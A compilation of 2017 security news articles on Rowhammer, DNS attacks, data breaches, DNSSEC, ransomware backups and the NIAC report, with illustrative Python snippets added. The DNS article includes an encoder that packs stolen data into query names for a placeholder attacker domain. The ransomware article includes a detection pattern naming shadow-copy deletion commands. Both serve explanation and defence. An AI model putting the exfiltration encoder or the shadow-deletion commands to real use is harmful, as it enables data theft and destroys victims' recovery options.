
RAM, bam, awww … man! Boffins defeat Rowhammer protections

Ever since Rowhammer first emerged, there’s been something of an arms race between researchers and defenders, and the boffins firing the latest shot reckon they’ve beaten all available protections.

In the two years since Google first showed how forced bit-flipping could cause memory errors and create a takeover vector, boffins have worked on hardware and software mitigations on one side, and new attacks on the other.

An Austrian-American-Australian collaboration now offers up the worst of bad news: all the current defences can be defeated – and their attack can work remotely, including against cloud-based systems.

In this paper, the eight collaborators * present an attack they call “one-location hammering”.

This offers a new way to trigger the bug, they write: “we do not hammer multiple DRAM rows but only keep one DRAM row constantly open. Our new exploitation technique, opcode flipping, bypasses recent isolation mechanisms by flipping bits in a predictable and targeted way in userspace binaries”.

To make sure their attack is predictable, the boffins “replace conspicuous and memory-exhausting spraying and grooming techniques” with what they call “memory waylaying”. This tricks the operating system into putting target pages at physical memory locations controlled by the attacker.

Time to start again

The researchers say current Rowhammer mitigations fail in the face of their attack.

It’s easy to defeat static analysis, they write, by running code within Intel SGX enclaves; this also defeats mitigations based on performance counters.

One-location hammering gets around a third mitigation, software that analyses memory access patterns; and defences based on physical memory isolation are the target of their “opcode flipping”.

“Opcode flipping exploits the fact that bit flips in opcodes can yield different, yet valid opcodes”, the paper says. They demonstrate the technique against the sudo command, “allowing exploitation of any of the 29 offsets in the sudo binary to gain root privileges”.
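As a toy illustration of the idea (this is not the paper's own tooling), a single bit flip really can turn one valid x86 opcode into another: `je` (jump if equal) is encoded as 0x74 and `jne` (jump if not equal) as 0x75, so flipping the lowest bit inverts a branch, precisely the kind of change that could skip a privilege check.

```python
# Toy illustration: a single Rowhammer-style bit flip turns one valid
# x86 opcode into a different valid one. JE (jump if equal, 0x74) and
# JNE (jump if not equal, 0x75) differ in exactly one bit, so flipping
# it inverts the branch condition.

def flip_bit(byte: int, bit: int) -> int:
    """Flip one bit in a byte, as a DRAM disturbance error would."""
    return byte ^ (1 << bit)

JE, JNE = 0x74, 0x75  # x86 short conditional jump opcodes

flipped = flip_bit(JE, 0)
assert flipped == JNE
print(f"0x{JE:02x} (JE) with bit 0 flipped -> 0x{flipped:02x} (JNE)")
```

The researchers' contribution is steering such flips onto attacker-chosen offsets in a binary like sudo; the snippet only shows why a one-bit error can be semantically meaningful.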

To get around protections that work by analysing the memory footprint of a Rowhammer attack, the researchers use “memory waylaying”. This “performs replacement-aware page cache eviction, using only page cache pages. These pages are not visible in the system memory utilization as they can be evicted any time and hence, are considered as available memory. Consequently, memory waylaying never causes the system to run out of memory.”

As already mentioned, the researchers claimed their attack could work against cloud-based systems. Since taking out a machine on AWS or Azure clouds would bring down the wrath of giants, they tested the attack on configurations designed to simulate cloud servers (Haswell- and Skylake-based servers). ®

* Graz University of Technology’s Daniel Gruss, Moritz Lipp, Michael Schwarz, Jonas Juffinger and Wolfgang Schoechl; Daniel Genkin of the University of Maryland and University of Pennsylvania; and Sioli O’Connell and Yuval Yarom of the University of Adelaide, the last also of CSIRO’s Data61


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/05/rohwammer_defences_defeated_by_opcode_flipping/

DNS a ‘Victim of its Own Success’

Why securing the Domain Name System remains an afterthought at many organizations.

It’s been nearly one year since the massive DDoS attack on Domain Name System (DNS) provider Dyn that disrupted major websites including Amazon, CNN, Netflix, Okta, Pinterest, Reddit, and Twitter, but DNS security remains an enigma for many businesses.

According to a new study conducted by Dimensional Research on behalf of Infoblox, some three out of 10 companies have been hit with cyberattacks on their DNS infrastructure; 93% of those suffered downtime – 40% of them for an hour or more. But that likely just scratches the surface of the volume of attacks on DNS, experts say, because many DNS attacks are tough to detect.

“That number [of attacks] seems a little low,” says DNS pioneer Paul Vixie, CEO and founder of DNS security firm Farsight Security, of the new data. Vixie, who is the principal author of the pervasive BIND DNS server software and creator of several DNS standards, notes that it’s difficult for some organizations to pinpoint that an attack came via their DNS.

Downtime costs, too, are likely higher than the Dimensional/Infoblox study data shows. Some 54% of organizations in the study say they lost $50,000+ to a DNS attack, while nearly a quarter lost $100,000+. “There are things you can count, but you don’t know about every attack that happens or every actual cost because it isn’t always” quantifiable, so the losses could be more, Vixie notes.

Prakash Nagpal, vice president at network and DNS security firm Infoblox, concedes that there likely are more DNS attacks that just aren’t discovered. “I do think more companies have been” hit than that, he says of the data. The most well-known DNS threats are distributed denial-of-service attacks, of course, he says. But “DNS is not just about DDoS attacks,” Nagpal says.

“In a lot of cases they [victims] don’t know they were subjected to DNS attacks because they [the attacks] are so subtle … I don’t think people make the connection between DNS and malware” distribution and data exfiltration, he says.

An infected machine has to “call home” at some point, he says, and one of the most common types of DNS attacks is where attackers use the DNS to siphon data from the victim organization. The infected machine is forced to make DNS requests to the attacker’s server, which in turn pulls the stolen data from that machine during those interactions. So if an executive’s laptop is infected, the attackers can pull sensitive data such as financial reports, for example, via those DNS queries, he says.
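The exfiltration channel Nagpal describes can be sketched in a few lines: the stolen bytes are encoded into the query names themselves, so the data leaves the network as ordinary-looking lookups against the attacker's nameserver. This is a minimal illustration rather than any particular malware's encoder, and "evil.example" is a placeholder domain.

```python
# Sketch of DNS-based exfiltration: stolen bytes are hex-encoded and
# embedded as subdomain labels of an attacker-controlled domain
# ("evil.example" is a placeholder). Each lookup the infected machine
# performs delivers one chunk to the attacker's nameserver, which logs
# the queries and reassembles the data. Nothing is sent on the wire
# here; this only builds the query names.

ATTACKER_DOMAIN = "evil.example"   # hypothetical
MAX_LABEL = 63                     # DNS limits a label to 63 octets

def exfil_queries(data: bytes, domain: str = ATTACKER_DOMAIN):
    encoded = data.hex()
    # One query per label-sized chunk; a sequence number keeps order
    # even when the resolver reorders or retries queries.
    return [
        f"{i:04x}.{encoded[i:i + MAX_LABEL]}.{domain}"
        for i in range(0, len(encoded), MAX_LABEL)
    ]

for q in exfil_queries(b"Q3 financial report: revenue down 12%"):
    print(q)
```

The same shape of traffic is what defenders look for: long, high-entropy labels and bursts of unique subdomains under one zone.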

“While DDoS remains a big source of downtime and a huge source of attack, where DNS is being used in data exfiltration” should also be of concern, according to Nagpal.

The Infoblox study, which queried more than 1,000 security and IT professionals worldwide, illustrated how reactive DNS security tends to be in organizations: three quarters of organizations who haven’t experienced a DNS attack say antivirus monitoring is their main focus security-wise, but 70% of those who’ve been hit by a DNS attack rank DNS security as their number one security priority.

“DNS is a victim of its own success. How many times do you think about how your phone call gets routed? You’re not supposed to; the same in the IP space,” Nagpal says. There also can be a learning curve for DNS and its security implications, he says.

“DNS [security] is still not top of mind,” Nagpal says.

The Oct. 21, 2016, wave of DDoS attacks on Dyn – courtesy of the historic Mirai botnet of infected Internet of Things devices – used masked TCP and UDP traffic via Port 53, as well as recursive DNS retry traffic, to overwhelm the DNS provider’s infrastructure. The DNS traffic sent in the DDoS was the most perplexing part of the attack to detect.

Scott Hilton, executive vice president of product for Dyn, explained in the aftermath that the DNS traffic sent in the DDoS attacks also generated legitimate DNS retry traffic, making the attack more complicated to parse; the attack generated 10 to 20 times the normal DNS traffic levels thanks to malicious and legitimate retries.

“During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic,” he said in a blog post. “When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume. We saw both attack and legitimate traffic coming from millions of IPs across all geographies.”

More DNS Security Woes

Meanwhile, Google researchers this week disclosed they had found seven security flaws in Dnsmasq, DNS software used in Android, home routers, and IoT devices. The flaws have since been fixed, but the chance of most IoT devices receiving the patches is slim, since those devices traditionally don’t get software updates. Vixie says the bugs have to do with the software, not DNS itself. “It’s a cute little piece of software, tiny, and not sloppy code. But it had bugs” like most other software, and these devices run it, he says.

Android devices are less at risk given built-in security features, but millions of IoT devices could be exploited, experts say. Craig Young, computer security researcher for Tripwire’s Vulnerability and Exposures Research Team, says the RCE flaw (CVE-2017-14491) specifically can be abused via malicious DNS replies, but would be difficult to exploit to build a Mirai-type botnet without the attacker jumping through various hoops. Among those: he or she would have to force the vulnerable device to issue a DNS request that the attacker would reply to, for example. Even so, he says “the possibility of widespread attack cannot be entirely ruled out.” 

It’s another example of just how easily IoT devices can be abused. “The cheaper the device, the more you can fear it,” Vixie says. “I expect more Mirais” to emerge, he adds, because locking down IoT devices is a major cost that doesn’t square economically with low-cost consumer devices.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/perimeter/dns-a-victim-of-its-own-success--/d/d-id/1330048?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Yahoo, Equifax Serve as Cautionary Tales in Discerning Data Breach Scope

Both companies this week revealed that their previously disclosed breaches impacted a lot more people than previously thought.

Yahoo and Equifax’s separate disclosures this week that previously reported data breaches at their organizations were even bigger than first thought illuminated the massive challenge enterprises face in gauging the true scope of malicious intrusions these days.

Yahoo’s parent company Verizon on Tuesday said an August 2013 breach that Yahoo disclosed in Dec. 2016 impacted a mind-boggling three billion email accounts rather than the one billion figure originally reported. 

Following Verizon’s acquisition of Yahoo and during the integration of the two companies, Yahoo obtained new information showing that every single one of its user accounts in August 2013 was compromised, Verizon subsidiary Oath said in a statement. The investigation showed that the data that was stolen did not include, however, clear text passwords, payment card data, or bank account information, the company said.

In a similar update the day before, Equifax said that the actual number of people impacted by the breach it disclosed on Sept. 7 was 145.5 million, or 2.5 million more than the number it had first reported. The company said a forensic analysis conducted by cybersecurity firm Mandiant unearthed the additional victims. The investigation showed that no databases outside the US were impacted, Equifax said, while also revising downward the number of Canadian victims impacted from 100,000 to 8,000.

Nathan Wenzler, chief security strategist at security consulting firm AsTech, says multiple factors can make it hard for organizations to get a true handle on the scope of intrusions such as the ones at Yahoo and Equifax. “Most of it centers on the lack of sound asset management and inventory processes,” he says.

Many organizations don’t actually know what they have to begin with, and therefore struggle to figure out what was breached when an incident occurs. “And, to be fair, a lot of hackers don’t make it easy to figure out either,” Wenzler says. “Systems can be compromised quietly, with no trace of anything serious being done, which can make it difficult for a researcher to know for certain that a system was compromised.”

Companies with a less than perfect understanding of their assets are likely to keep discovering more datasets that have been compromised than they originally assumed when investigating a breach incident, he says.

CEO in the Hotseat

Equifax’s update this week added to broad concerns over its response to the breach overall, including its 45-day delay in breach notification and its inadvertently pointing those wanting to sign up for free credit monitoring to a phishing website.

Former Equifax CEO Richard Smith, who retired from the company after the breach, this week acknowledged mistakes with the rollout of the signup website and call centers. In many cases, such issues added to the frustration of American consumers, he said in prepared testimony for a US House Committee on Energy and Commerce subcommittee, which held a hearing on the breach this week.

The testimony delved into some details of the incident. Smith noted that when Equifax’s security organization first heard from US-CERT about an Apache Struts vulnerability that needed to be patched, the information was promptly relayed to all applicable personnel. However, the vulnerability remained unpatched and was not caught in subsequent scans, giving the intruders a way into Equifax’s network.

In some cases, organizations that suffer large, sophisticated breaches will never know the full scope of their impact, says Michael Sutton, CISO at Zscaler. With Yahoo, there’s no information on what new evidence led it to the two billion additional breached accounts one year after the original discovery. That the initial investigation failed to catch such a huge number of compromised accounts is significant, he says.

“While it’s possible that new evidence, such as logs were uncovered that hadn’t previously been reviewed, more likely a new connection was made,” he says. “Breach investigations are all about connecting the dots — identifying an entry point and figuring out where the attacker went from there,” he says. “Without transparency from Yahoo, we can only speculate as to what new dots were connected.”

Generally, determining the full scope of an incident can be hard when multiple entry points are involved and when multiple devices or accounts are compromised, Sutton notes.

Investigators had a hard time figuring out what was stolen from Equifax because the records were stored in various data tables across multiple systems, according to the CEO’s testimony. So tracing the records back to specific individuals, given the massive scope of the compromise, was very time consuming and difficult, he said.

The telltale signs of such attacks can be scattered and hard to find even if they exist. “Following the trail of breadcrumbs to trace the attacker’s path requires that the bread crumbs exist in the first place,” Sutton says. “It’s possible that logs have blind spots or have been overwritten, especially when a breach investigation takes place months or years after the incident.”

Backup logs are one place where a breached entity might discover more records than were originally presumed compromised in an incident, says Alex Held, chief research officer at SecurityScorecard.

Attackers can put in a lot of effort to erase evidence of unauthorized access following a successful attack. Log removal is often the final step in this effort because it can blur the true scope of the incident and make attribution difficult. In such situations, backup logs that may not have been available during the initial investigation can shed fresh light on the true scope of the incident, he says.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/yahoo-equifax-serve-as-cautionary-tales-in-discerning-data-breach-scope-/d/d-id/1330051?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Nation-State Attackers Steal, Copy Each Other’s Tools

When advanced actors steal and re-use tools and infrastructure from other attack groups, it makes it harder to attribute cybercrime.

New research indicates cybercriminals are making attacker attribution increasingly complex by re-using tools and tactics from other hacker groups.

Researchers on the Kaspersky Lab Global Research and Analysis Team (GReAT) found evidence that sophisticated threat actors are hacking other attack groups to steal victim data, borrow tools and techniques, repurpose exploits, and compromise the same infrastructure.

The result is a major attribution challenge. Reliable threat intelligence is based on identifying patterns and tools associated with a specific threat actor. These signs help security researchers map the targets and behaviors of different attackers. When hackers start hacking one another, using the same tools, and targeting the same victims, the model breaks down.

Kaspersky believes these types of attacks are most likely to be used among nation-state backed groups targeting foreign or less competent actors. IT security researchers should know how to detect and interpret these attacks so they can present their intelligence in context.

The idea behind this research was to better understand the practice of fourth-party collection through signals intelligence (SIGINT), which involves the interception of a foreign intelligence service’s computer network exploitation (CNE) activity. Researchers observed attackers’ actions and, in doing so, found evidence showing they actively steal from one another.

“In less technical terms, fourth-party collection is the practice of spying on a spy spying on someone else,” explain GReAT researchers Juan Andrés Guerrero-Saade and Costin Raiu in a post on Kaspersky’s SecureList blog.

There are two main approaches to these attacks: passive and active. Passive involves intercepting other groups’ data while it’s in transit between victims and command-and-control (C&C) servers. It’s almost impossible to detect. Active collection, however, leaves footprints.

Active attacks involve breaking into another threat actor’s malicious infrastructure. It’s dangerous for attackers because it heightens the risk of detection, but it’s also beneficial. The success of active collection depends on the target making operational security errors.

During their investigation of specific threat actors, the GReAT team found several pieces of evidence suggesting these active attacks are already happening in the wild. These include:

Backdoors installed in another actor’s C&C infrastructure

Researchers found two examples of backdoors in hacked networks, which let attackers persistently infiltrate another group’s operations. One of these instances was discovered in 2013 during an investigation of the NetTraveler attacks. Researchers obtained a server and, during their analysis, discovered a backdoor seemingly placed by another actor. It’s believed the goal was to maintain prolonged access to the NetTraveler infrastructure or the stolen data.

Another was found in 2014 while investigating a hacked website used by Crouching Yeti, also known as “Energetic Bear,” an APT actor active since 2010. Researchers noticed the panel managing the C&C network was modified with a tag pointing to a remote IP in China, which is believed to be a false flag. They think this was also a backdoor belonging to another group.

Sharing compromised websites

In 2016, Kaspersky found that a website hacked by DarkHotel also hosted exploit scripts for another attacker, codenamed “ScarCruft,” which primarily targeted Russian, Chinese, and South Korean organizations. That actor relied on watering hole and spearphishing attacks.

Targeting attackers’ focus areas

By infiltrating a group with a stake in a specific region or industry, attackers can benefit from another group’s work and specifically target certain groups of people. Sharing victims is risky for attackers: if one group gets caught, analysis will reveal who the other threat actors were.

In November 2014, Kaspersky researchers located a server at a Middle Eastern research institution that hosted implants for the advanced actors Regin, Equation Group, Turla, ItaDuke, Animal Farm, and Careto. The find eventually led to the discovery of the Equation Group.


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/nation-state-attackers-steal-copy-each-others-tools/d/d-id/1330052?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DNSSEC master key change delayed after ISPs struggle

Something has gone awry with Internet governing body ICANN’s timetable for changing the cryptographic root key used by DNSSEC (Domain Name System Security Extensions), a technology first deployed in 2010 to protect the global DNS system from cache poisoning attacks.

Scheduled to happen on 11 October, this important event has now been postponed until the first quarter of 2018 after ICANN discovered a number of ISPs were having trouble with the automated key update process.

Under a plan posted in July, ISPs using DNSSEC were supposed to have installed the new Root Zone Key Signing Key (KSK) that lies at the heart of the system within 90 days.

ICANN’s research suggested around 5-8% of ISPs hadn’t.

It’s the first time the key has ever been changed in DNSSEC’s short history, so perhaps problems were to be expected. Explained ICANN:

There may be multiple reasons why operators do not have the new key installed in their systems: some may not have their resolver software properly configured and a recently discovered issue in one widely used resolver program appears to not be automatically updating the key as it should, for reasons that are still being explored.

In other words, ISPs may have thought they’d implemented it but hadn’t, because of an undetected technical glitch. Had ICANN not halted final deployment, domains resolved through these providers would suddenly have become unreachable next week.

But is DNSSEC that important?

The technology’s origins go back to 2008, when a researcher called Dan Kaminsky discovered a problem with the DNS protocol used to resolve human-readable domain names into computer-friendly IP addresses.

The gist was that an attacker could redirect users looking for a real domain to a spoofed one by compromising the domain record held in a DNS cache. Users would be sent to the fake site for as long as the spoofed record remained in the cache.
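A toy resolver cache (no networking, and far simpler than the real protocol) shows why a poisoned record is so effective: whoever gets a record into the cache controls where every client of that resolver is sent until the TTL expires.

```python
# Toy resolver cache illustrating cache poisoning. Once a spoofed
# answer lands in the shared cache, every client asking this resolver
# for the name receives the attacker's IP until the record expires.
import time

cache = {}  # name -> (ip, expiry timestamp)

def cache_put(name: str, ip: str, ttl: int) -> None:
    cache[name] = (ip, time.time() + ttl)

def resolve(name: str):
    """Return the cached IP for a name, or None if absent/expired."""
    ip, expiry = cache.get(name, (None, 0.0))
    return ip if time.time() < expiry else None

# An attacker races the real answer and wins (names/IPs are made up):
cache_put("bank.example", "203.0.113.66", ttl=3600)
print(resolve("bank.example"))  # all clients are now sent to 203.0.113.66
```

DNSSEC's answer, described next, is to make forged answers detectable rather than to win the race.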

The answer experts came up with was to verify every level of the DNS hierarchy cryptographically – a chain of trust – but that meant there had to be an ultimate authority: a key sitting on root servers at the apex of the system. This is the Root Zone KSK.
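The chain of trust can be modelled in miniature: each parent zone publishes a digest of its child's key (as a DS record does), and everything hangs off the one out-of-band trust anchor, the Root Zone KSK. This sketch uses plain hashes instead of real DNSSEC signatures, and the zone keys are made up.

```python
# Toy model (not real DNSSEC) of the chain of trust: each parent
# publishes a digest of its child's key, and the root key is the one
# out-of-band trust anchor. Swapping any key along the path, or
# validating against the wrong anchor, breaks the chain.
import hashlib

def digest(key: bytes) -> str:
    return hashlib.sha256(key).hexdigest()

# Hypothetical zone keys, root -> com -> example.com
keys = {".": b"root-ksk", "com.": b"com-key", "example.com.": b"example-key"}
# Each parent stores a digest of its child's key (like a DS record).
ds = {"com.": digest(keys["com."]),
      "example.com.": digest(keys["example.com."])}

def validate(chain, trust_anchor: bytes) -> bool:
    """Walk from the root down, checking each key against the digest
    its parent published."""
    if digest(keys[chain[0]]) != digest(trust_anchor):
        return False  # root key doesn't match the configured anchor
    return all(digest(keys[zone]) == ds[zone] for zone in chain[1:])

assert validate([".", "com.", "example.com."], trust_anchor=b"root-ksk")
# A resolver still holding an outdated anchor fails validation, which
# is exactly the failure mode a KSK rollover risks.
assert not validate([".", "com.", "example.com."], trust_anchor=b"old-root-ksk")
```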

The changing of the KSK began with an almost religious ceremony in a windowless room in California last year but there is in fact no fundamental reason why it has to be completed this month.

When DNSSEC started, ICANN committed to changing the KSK every five years, a timetable that has already slipped. Nevertheless, everyone knows it has to be changed at some point simply to demonstrate “cryptographic hygiene”.

Naked Security understands that ICANN will now monitor uptake in the coming weeks before, as a last resort, publishing a list of providers that have failed to apply the new key correctly.

The bigger picture here is DNSSEC. This is still not adopted by a swathe of Internet providers, wary perhaps of the management complexity of its cryptographic design. It is, however, mandatory for the new generic Top-Level Domains (gTLDs) that started appearing in 2013.

Uptake of DNSSEC will surely increase over time and a smooth transition from the old to the new Root Zone Key Signing Key (KSK) can only help with adoption.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/2ehTO95EsRw/

Russian suspected of $4bn Bitcoin laundering op to be extradited to US

A Greek court has approved the US extradition of a Russian national accused of running a $4bn Bitcoin laundering ring on the now-defunct BTC-e exchange.

Alexander Vinnik, 38, was arrested in Greece in July and is wanted by both the States and Moscow. Authorities suspect he was the ringleader, responsible for the alleged laundering activity since 2011.

Vinnik has denied the charges against him. Reuters reports that a Greek court today cleared him to be extradited to America, where he could face up to 55 years in prison if convicted.

He is reportedly appealing the decision in Greece’s supreme court.

The risk of money laundering is one reason why some shy away from decentralised virtual cryptocurrencies such as Bitcoin. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/04/russian_accused_of_laundering_4_billion_in_bitcoin_to_be_extradited_to_us/

Ransomware Will Target Backups: 4 Ways to Protect Your Data

Backups are the best way to take control of your defense against ransomware, but they need protecting as well.

Ransomware has had a banner year so far. Two major attacks — WannaCry and NotPetya — have caused, conservatively, hundreds of millions of dollars in damages, while cybercriminals continue to target users’ systems and data.

Proactive companies, however, do have options. The most consistent defense against ransomware continues to be good backups and a well-tested restore process. Companies that consistently back up their data and can quickly detect a ransomware attack should be able to restore their data and operations with a minimum of disruption.

In some cases, we have seen wiper malware such as NotPetya pretending to be Petya ransomware while serving a similar ransom note. In these attacks, the victims won’t be able to get their files back even if they pay the ransom — making the ability to restore from a backup even more critical.

For that reason, the cybercriminals — and, in some cases, nation-state agents — behind ransomware have begun targeting the backup processes and tools, as well. Several ransomware programs — such as the recent WannaCry (WannaCrypt0r) and the newer version of CryptoLocker — delete the shadow volume copies created by Microsoft’s Windows operating system. Shadow copies are a simple method that Microsoft Windows provides for easy restoration.
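Shadow-copy removal is usually performed with a handful of well-known commands (WannaCry, for instance, ran `vssadmin delete shadows /all /quiet`), which makes it a useful detection signal. The sketch below is an illustrative heuristic, not vendor guidance: it flags those command lines in process-creation telemetry.

```python
# Detection sketch (illustrative, not vendor guidance): ransomware
# commonly removes Windows shadow copies with command lines such as
# "vssadmin delete shadows /all /quiet" or "wmic shadowcopy delete".
# Flagging these in process-creation telemetry gives an early warning
# that restore points are being destroyed.
import re

SUSPECT_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]

def is_shadow_copy_deletion(cmdline: str) -> bool:
    return any(p.search(cmdline) for p in SUSPECT_PATTERNS)

# Example process-creation events (hypothetical telemetry):
events = [
    "vssadmin.exe delete shadows /all /quiet",
    "vssadmin list shadows",
]
for e in events:
    print(e, "->", "ALERT" if is_shadow_copy_deletion(e) else "ok")
```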

On the Mac, cybercriminals targeted backups from the get-go. Researchers have discovered incomplete functions in the first Mac ransomware — released in 2015 — that targeted the disk used by the Mac OS X operating system’s automated backup tool called Time Machine.

The strategy is straightforward: Encrypt the backup and individuals or companies are likely to lose the ability to restore data and are more likely to pay a ransom. Attackers are escalating their efforts beyond infecting single workstations and aim to destroy the backups, too.

Here are four recommendations to help companies protect their backups against ransomware attacks.

1. Be careful using network file servers and online sharing services.
Network file servers can be easy to use and are always available, two attributes that make network-accessible “home” directories a popular way to centralize data and make it easy to back up. However, when exposed to ransomware, this type of data architecture has serious security weaknesses. Most ransomware programs encrypt connected drives, so the victim’s home directory would be encrypted as well. In addition, any server that runs a vulnerable and highly targeted operating system like Windows could be infected, which would lead to every user’s data being encrypted.

Thus, any company with a network file server needs to assiduously back up the data to a separate system or service, and specifically test the system’s restore capability if faced with ransomware.

Cloud file services aren’t immune to ransomware either. In 2015, Children in Film, a business providing information for child actors and their parents, got hit with ransomware. The company extensively used the cloud for its business, including a common cloud drive. Within 30 minutes of an employee clicking on a malicious e-mail link, more than 4,000 files stored in the cloud were encrypted, according to an article in KrebsOnSecurity. Fortunately, the company’s backup provider was able to restore all of the files, even though it took almost a week to complete the process.

Depending on whether the cloud service provides incremental backups or easily managed file histories, recovering data in the cloud could be more difficult than from an on-premises server.

2. Get visibility into your backup process.
The earlier a company can detect a ransomware infection, the more likely the business can prevent significant corruption of data. Data from the backup process can provide early warning of a ransomware infection: a program that suddenly encrypts your data leaves signs in your backup log. Incremental backups will suddenly “blow up” as every file is essentially changed, and the encrypted files can’t be compressed or deduplicated.
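That incompressibility is easy to measure. The sketch below flags likely-encrypted data by its compression ratio, the same signal a backup job would see; the 0.9 threshold is an illustrative assumption, not a product setting.

```python
# Sketch of the backup-telemetry signal: encrypted data is effectively
# random and therefore incompressible, so a file whose compression
# ratio suddenly jumps toward 1.0 is suspect. Threshold is illustrative.
import os
import zlib

def compression_ratio(data: bytes) -> float:
    """Compressed size / original size; ~1.0 means incompressible."""
    if not data:
        return 0.0
    return len(zlib.compress(data)) / len(data)

def looks_encrypted(data: bytes, threshold: float = 0.9) -> bool:
    return compression_ratio(data) > threshold

plaintext = b"quarterly report " * 1000   # highly compressible
ciphertext = os.urandom(16_000)           # stand-in for encrypted bytes
print("plaintext ratio:", round(compression_ratio(plaintext), 3))
print("ciphertext ratio:", round(compression_ratio(ciphertext), 3))
assert not looks_encrypted(plaintext)
assert looks_encrypted(ciphertext)
```

In practice a backup product would track this per file across runs, alerting when a large fraction of a dataset crosses the threshold at once.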

Monitoring vital metrics such as capacity utilization from the backup process on a regular basis — essentially, every day — can help companies detect when ransomware has infected a system inside the company and limit the damage from the compromise.

3. Consider your solution options.
If ransomware can directly access backup images, it will be very challenging, if not impossible, to stop it from encrypting corporate backups. For that reason, a purpose-built backup system that abstracts the backup data will be able to prevent ransomware from encrypting historical data.

By separating backups from your normal operating environment and making sure the process is not running on a general-purpose server and operating system, your backups can be hardened against attack. Backup systems based on the most commonly targeted operating system, Microsoft Windows, are prone to being attacked and make it much harder to protect your backup data.

4. Regularly test your recovery process.
Finally, backups are no good unless you can recover both reliably and quickly. Some victims of ransomware have had backups but still have had to pay the ransom because the backup schedule did not perform backups with enough granularity, or they were not backing up the data they thought they were backing up.

Part of testing the recovery process is determining the window of data loss. A company that does a full backup every week will lose up to a week of data should it need to recover after its last backup. Doing daily or hourly backups greatly increases the level of protection. More granular backups and detecting ransomware events as early as possible are both key to fending off damage.
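The window arithmetic above is straightforward; a quick worked example, with illustrative figures, makes the trade-off concrete.

```python
# Worked example of the data-loss window (the "recovery point
# objective"): the worst case equals the backup interval, since
# ransomware can strike just before the next backup runs. Figures
# are illustrative, not a recommendation.
INTERVAL_HOURS = {"weekly": 7 * 24, "daily": 24, "hourly": 1}

def worst_case_loss_hours(schedule: str) -> int:
    """Maximum hours of data at risk for a given backup schedule."""
    return INTERVAL_HOURS[schedule]

for name in ("weekly", "daily", "hourly"):
    print(f"{name:>6} backups -> up to "
          f"{worst_case_loss_hours(name)} hour(s) of data at risk")
```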

In the end, companies should aim to detect ransomware attacks early through monitoring or anti-malware defenses, use a purpose-built system to maintain a separation between the backup data and a potentially compromised system, and regularly test the backup and restore process to ensure data is properly protected.

These efforts will keep backups at the top of the list of ransomware defenses and will reduce the risk of losing data in the event of an attack.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Rod Mathews serves as Senior VP General Manager, Data Protection Business, for Barracuda. He directs strategic product direction and development for all data protection offerings, including Barracuda’s backup and archiving products, and is also responsible for Barracuda’s … View Full Bio

Article source: https://www.darkreading.com/endpoint/ransomware-will-target-backups-4-ways-to-protect-your-data/a/d-id/1330029?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

What Security Teams Need to Know about the NIAC Report

Which of the recommendations made by the NIAC working group will affect security teams the most, and how should they prepare?

A report from the National Infrastructure Advisory Council (NIAC) suggests that the United States is in a “pre-9/11 moment.” The authors were addressing the potential of a catastrophic cyber attack against the US that could result in the cyber equivalent of the 9/11 attack.

After the cybersecurity executive order was issued in May, the National Security Council (NSC) tapped the NIAC to determine how federal agencies and capabilities could be applied to improve the cybersecurity of critical infrastructure assets. The council focused on assets that, if attacked, could result in “catastrophic regional or national effects on public health or safety, economic security, or national security.” Which of the recommendations will affect security teams, and what should they do to prepare? These developments, arising from three specific recommendations, should be tracked closely:

1. Recommendation: Identify the best-in-class scanning tools and assessment practices, and then apply them to the most critical networks.

A security team may do a good job of testing its own networks, but connections with other networks (e.g., vendors and partners) that are necessary for conducting business limit overall operational security. Making the best assessment tools broadly available will not only benefit direct users of your product or service but also, done as a collective effort with other enterprises, increase overall nationwide security. A “Center of Excellence” for scanning and assessment tools will create a testing environment to evaluate software for wide use, particularly by small and midsize businesses and educational institutions that might otherwise lag behind large organizations.

Action: Security teams should track this development because it is intended to support best practices in a shared environment that will make network testing more effective and less costly.

2. Recommendation: Establish limited-time, outcome-based market incentives to encourage organizations to upgrade cyber infrastructure, invest in state-of-the-art technologies, and meet industry standards or best practices.

Budgetary constraints sometimes lead organizations to make suboptimal decisions about the types of processes and technologies they implement to prevent cyber attacks. The NIAC report recommends implementing tax credits to enable and encourage security system upgrades, which will free up significant financial resources that can be directed toward improving cyber resilience.

It also urges relief from government security audits when industry standards are consistently met. How can anyone tell when industry standards are met? The council strongly recommends implementing the National Institute of Standards and Technology (NIST) Cybersecurity Framework in order to qualify for incentives.

Action: Security teams should begin orienting their cybersecurity program around the NIST Cybersecurity Framework, and they should track and support the development of legislation to provide incentives to organizations that can demonstrate a standardized level of cyber maturity.

3. Recommendation: Establish separate, secure communications networks specifically designated for the most critical cyber networks.

While the primary inspiration for this recommendation is the utility industry’s IT and OT networks, the definition of “critical infrastructure” has broadened. It now includes other computing networks without which the country couldn’t operate, including financial systems. As the threats escalate and attacks become more organized, leveraging “dark fiber” networks and other alternatives for key critical communications is highly recommended.

Action: In addition to tracking the development of dark fiber networks, security teams supporting critical infrastructure should identify the most critical communication processes and evaluate how those can be hardened, including the use of private networks. 

